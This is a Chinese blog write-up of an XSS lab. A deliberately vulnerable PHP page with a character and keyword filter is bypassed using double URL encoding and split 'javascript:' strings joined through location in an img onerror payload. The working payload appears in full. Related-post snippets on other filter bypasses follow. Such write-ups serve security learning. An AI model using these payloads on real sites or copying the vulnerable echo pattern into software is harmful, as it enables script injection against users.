urlcode编码绕过xss限制

最新推荐文章于 2024-05-11 14:15:05 发布
最新推荐文章于 2024-05-11 14:15:05 发布
阅读量618 收藏
点赞数 1
文章标签: xss php 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42902697/article/details/127791140
版权

文章目录

网页代码

<?php
    header('X-SS-Protection:0');
    $xss = isset($_GET['xss'])?$_GET['xss']:'';

    $xss = str_replace(array("(",")","&","\\","<",">","'"),'',$xss);
    if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/',$xss)){
        exit('bad');
    }
    echo "<img src=\"{$xss}\">"
?>

分析

首先是通过字符替换限制XSS攻击,这一点可以使用URLCode转码的方式进行绕过。
URLCdoe编码格式为“%”加字符ASCII码的十六进制,例如“(”的ASCII码为40,转换为十六进制为28,所以“(”的URLCode编码为%28。
但是仅仅转换一次是不够的,因为地址栏中的URLCode在敲下回车的一瞬间,浏览器就会自动转换,实际传入的还是“(”。解决这个问题很简单,将%也转换为URLCode就行,例如%2528。这样传进php的值就是%28,就不会被过滤掉。执行的时候才会被转换为(。

其次是关键词检测,可以将语句拆分成多个不含敏感词的子串传入,再通过location进行连接。例如:location=“javas”+“cript:a”+lert(1)"

实现

img标签的注入有很多方式,这里我使用onerror。
构造的xss注入代码为

1" onerror=location="javas"+"cript:a"+"lert(1)"

然后进行URLCode转码,得到

1"%20onerror=location="javas"%2B"cript:a"%2B"lert%25281%2529

执行
在这里插入图片描述

成功
在这里插入图片描述
注入后img标签的内容
在这里插入图片描述

萌萌软软酱
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xssbypass_【渗透技巧】XSS三重URL编码绕过实例
weixin_30126409的博客
12-23 3909
0x00 前言跨站脚本攻击(Cross Site Scripting),缩写为XSS,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在黑盒渗透中,XSS在很多网站中普遍存在,这边分享一个简单有意思的XSS三重URL编码绕过漏洞实例。0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双...
xss攻击字符过滤器 Java_使用Filter过滤器解决XSS跨脚本攻击和SQL注入问题
weixin_28839601的博客
02-24 945
在JAVA开发工程中难免会出现XSS和SQL注入漏洞,这些问题的产生都是由于url中带有js、html、特殊字符欺骗服务器达到请求数据。解决的思路是把传到后端的参数进行转义处理,从而避免这些问题的产生。第一步:自定义filter过滤器.public class XSSFilter extends OncePerRequestFilter {private String exclude = null...
XSS绕过技术
10-11
Cross-Site Scripting(XSS绕过技术,来自论坛:法克论坛,作者:bystand
第04篇:XSS三重URL编码绕过实例1
08-03
0x01 漏洞实例某次测试中,遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:如图,可以看到,双引号被转义了,这时候是不是有种想放弃的想法,抱着尝试的状
XSS三重URL编码绕过实例
04-11 1438
&#13; 遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:&#13; &#13; 双引号被转义了,我们对双引号进行URL双重编码,再看一下输出:&#13; &#13; 依然被转义了,我们再加一层URL编码,即三重url编码,再看一下输出:&#13; &#13; URL编码被还原为双引号,并带入到html中输入。构造Payload实现弹窗&#13; &#13; ...
XSSBypass:XSS绕过技术
05-17
XSS绕过 XSS绕过技术,带来乐趣和收益。 尝试使用XSS漏洞逐行绕过Web应用程序安全性XSS过滤器。
什么是URL/URL编码绕过
好好睡觉
11-07 1813
URLURL绕过
xss绕过编码绕过
m0_63581584的博客
06-03 2374
xss编码绕过 首先我们知道解析顺序,URL解码,HTML解码 ,CSS解码,JS解码 1.在服务端接受到请求后,一般是先进行url解码,然后在提取浏览器中参数。所以一般url编码是不能绕过。 2.如果我们输入了带有HTML实体编码值,只要在保证浏览器接受数据时能构建DOM树,就能进行解码操作。 下面为什么会进行url编码,不是为了绕过而进行的,因为HTML实体编码后(&#x63);会是这种情况。而浏览器在发送到服务端传参也是&进行传参分隔的,所以就会产生问题.我们就要进行url编码 3.我
复现urlcode编码绕过xss限制两个demo
ikta的博客
11-10 548
if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/', $xss)) { exit('bad'); }在上面的基础上进一步过滤script、document、cookie、eval、setTimeout、alert关键字。 因为onerror是js函数,不能编码符号,因此还是需要location这样的函数将其变为字符串**拼接**绕过
bugku---urldecode二次编码绕过
LuckySec
12-13 962
题目 首先了解下eregi()函数 eregi()函数 语法 int eregi(string pattern, string string, [array regs]); 定义 eregi()函数在一个字符串搜索指定的模式的字符串。搜索不区分大小写。 返回值 如果匹配成功返回true,否则,则返回false 由题目容易知道该代码是对GET的id值二次编码 第一次是浏览器默认对传入参数进行一次...
记录几种XSS绕过方式1
08-03
记录几种XSS绕过方式一.服务端全局替换为空的特性比如某站正则 过滤了onerror 过滤了script 这些 但是“ 或者 ‘ 这这种符号会变成空可以绕过,例
xss.rar_XSS_xss字符限制
09-24
PSTZine_0x03_0x04--突破XSS字符数量限制执行任意JS代码
XSS三重URL编码绕过实例.pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
[安全]复现urlcode编码绕过xss限制两个demo
紫洋的博客
11-16 719
题目利用replace函数将常见的"(",")","&","\\","","'"都替换成了空格符号,而想进行弹窗操作需要利用到onerror="alert(xxx)"函数。我们可以利用URLcode编码将括号转变为%28和%29,而URLcode编码会自动将%28和%29识别为括号,又会被限制,我们可以将%转换为相应的%25。而这时浏览器并未将%28和%29识别过来,原因是onerror函数为一个JS函数,在JS中是不允许编码符号的,就是在onerror内部不允许进行符号的编码
XSS漏洞-03】XSS漏洞语句构造和绕过方法实例
m0_64378913的博客
05-14 4001
目录1 XSS语句构造方式1.1 第一种:利用[<>]构造HTML/JS语句1.2 第二种:利用javascript:伪协议1.3 第三种:事件驱动1.4 第四种:利用CSS(层叠样式脚本)1.5 其他标签及手法2 XSS语句变形及绕过2.1 第一种:大小写混编2.2 第二种:**双写绕过**。2.3 第三种:**引号的使用**2.4 第四种:使用 [/] 代替空格2.5 第五种:在一些关键字内插入回车符与Tab符2.6 第六种:编码绕过2.7 第七种:拆分跨站2.8
深入讲解XSS利用编码绕过的原理
<XiaoHai>的博客
08-17 1811
xss
iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过
mooyuan的博客
11-30 2702
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第10关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的第10关卡过滤了select关键字并且进行了双重url解码了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双重url解码型注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
XSS绕过总结
qq_42990434的博客
05-29 7749
有时候明明有一个xss漏洞,但是却有xss过滤规则或者WAF保护导致我们不能成功的利用,这些会屏蔽掉我们的代码,会导致我们执行完代码之后什么反应都没有,这时候我们可以审查一下元素,看看我们的代码有没有替换为空,或者替换成其他东西,或者那些符号被过滤掉了。 比如:我们输入<script> alert(“hi”) </scrip>, 会被转换成<script> alert(>xss detected<) </scrip>,这样的话我们的js语句就不生效
XSS实战漏洞挖掘
最新发布
hmysn的博客
05-11 630
接下来一年时间将会主要研究渗透测试方向的众多问题,文章中的内容也会在后面定期更新。本文主要记录了一些XSS漏洞挖掘中的实用心得和学习笔记。
如果网站输入<被编码xss怎么绕过
07-11
对于绕过编码XSS 防护措施,有一些常见的方法可以尝试: 1. 使用特殊字符:尝试使用各种特殊字符来绕过过滤器,例如使用 URL 编码、HTML 实体编码或十六进制编码来混淆恶意代码。 2. 绕过过滤器:研究目标网站所使用的过滤器,并找到它们的弱点。有时候过滤器可能只会检测特定的关键词或字符,通过使用不同的编码或大小写来绕过。 3. 利用漏洞:检查目标网站是否存在其他安全漏洞,例如不正确的输入验证或不安全的直接输出。通过利用这些漏洞,可以绕过 XSS 防护措施并执行恶意代码。 4. 尝试不同的注入点:如果一个注入点被过滤或阻止了,可以尝试在其他可能的输入字段中注入恶意代码,例如隐藏字段、HTTP 头或用户代理。 请注意,这些方法仅供学习和研究之用,不应用于非法活动。同时,为了确保网站的安全,请开发人员采取适当的防御措施,如输入验证、输出编码和内容安全策略。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值